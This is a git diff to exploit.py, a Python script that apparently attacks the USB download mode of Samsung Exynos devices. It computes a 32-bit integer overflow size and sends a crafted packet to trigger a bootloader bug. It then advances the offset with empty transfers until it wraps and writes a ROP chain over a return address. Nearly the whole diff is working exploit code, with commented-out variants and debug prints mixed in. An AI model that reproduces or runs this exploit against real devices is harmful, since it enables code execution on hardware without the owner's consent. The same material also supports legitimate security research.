diff --git a/exploit.py b/exploit.py
index 5aa15f2..52c8579 100644
--- a/exploit.py
+++ b/exploit.py
@@ -90,37 +90,60 @@ class ExynosDevice():
 def exploit(self, payload: bytes):
 current_offset = TARGET_OFFSETS[self.target][0]
- transfered = 0
 transferred = ctypes.c_int()
- max_payload_size = (TARGET_OFFSETS[self.target][2] - TARGET_OFFSETS[self.target][0]) - 0x200
+ size_to_overflow = 0x100000000 - current_offset + TARGET_OFFSETS[self.target][1] + 8 + 6
+ max_payload_size = 0x100000000 - size_to_overflow
+
+ # max_payload_size = 0xffffffff - current_offset + DL_BUFFER_SIZE + TARGET_OFFSETS[self.target][1]
+ # max_payload_size = (TARGET_OFFSETS[self.target][2] - TARGET_OFFSETS[self.target][0]) - 0x200
 payload = payload + ((max_payload_size - len(payload)) * b"\x00")
 assert len(payload) == max_payload_size, "Invalid payload" # First send payload to trigger the bug
- bug_payload = p32(0) + p32(0xfdfde800) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0) # dummy packet for triggering the bug
+ bug_payload = p32(0) + p32(size_to_overflow) + payload[:MAX_PAYLOAD_SIZE] # dummy packet for triggering the bug
+ bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
 res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0)
 assert res == 0, "Error triggering payload"
- current_offset += len(bug_payload)
+ assert transferred.value == len(bug_payload), "Invalid transfered size"
+ current_offset += len(bug_payload) - 8 # Remove header
 # Send the actual payload
- transfered = 0
- res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
- assert res == 0, "Error sending payload"
+ # res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
+ # assert res == 0, "Error sending payload"
+ # current_offset += len(payload)
- current_offset += len(payload)
+ cnt = 0
 while True:
- if current_offset + CHUNK_SIZE >= TARGET_OFFSETS[self.target][2]:
+ if current_offset + CHUNK_SIZE >= TARGET_OFFSETS[self.target][1] and current_offset < TARGET_OFFSETS[self.target][1]:
 break
 self.send_empty_transfer()
+ current_offset += CHUNK_SIZE
+ cnt += 1
+ if current_offset > 0x100000000:
+ current_offset = current_offset - 0x100000000 #reset 32 byte integer
+ print(f"{cnt} {hex(current_offset)}")
- rop_chain = p64(TARGET_OFFSETS[self.target][0]) * (8 // CHUNK_SIZE)
+ remaining = (TARGET_OFFSETS[self.target][1] - current_offset)
+ assert remaining != 0, "Invalid remaining, needs to be > 0 in order to overwrite with the last packet"
+ if remaining > BLOCK_SIZE:
+ self.send_empty_transfer()
+ # Send last transfer, TODO who aligns this ROM??
+ current_offset += ((remaining // BLOCK_SIZE) * BLOCK_SIZE)
+ cnt += 1
+ print(f"{cnt} {hex(current_offset)}")
+
+ rop_chain = (b"\x00" * 0x110) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2)
+ # p_offset = (TARGET_OFFSETS[self.target][1] - current_offset)
+ # rop_chain = rop_chain[:p_offset] + (p64(TARGET_OFFSETS[self.target][0]))
+ # rop_chain = p64(TARGET_OFFSETS[self.target][0]) * 32
+ # Should
+ transferred = ctypes.c_int(0)
 res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0)
+ # assert transferred.value == len(rop_chain), "Error sending ROP chain"
-
- transfered = 0
- buf = ctypes.c_buffer(b"", 0x20000)
- res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_IN, buf, len(buf), ctypes.byref(transferred), 10000)
+ buf = ctypes.c_buffer(b"", 0x200000)
+ res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_IN, buf, len(buf), ctypes.byref(transferred), 1000)
 padding_size = TARGET_OFFSETS[self.target][1] - TARGET_OFFSETS[self.target][0]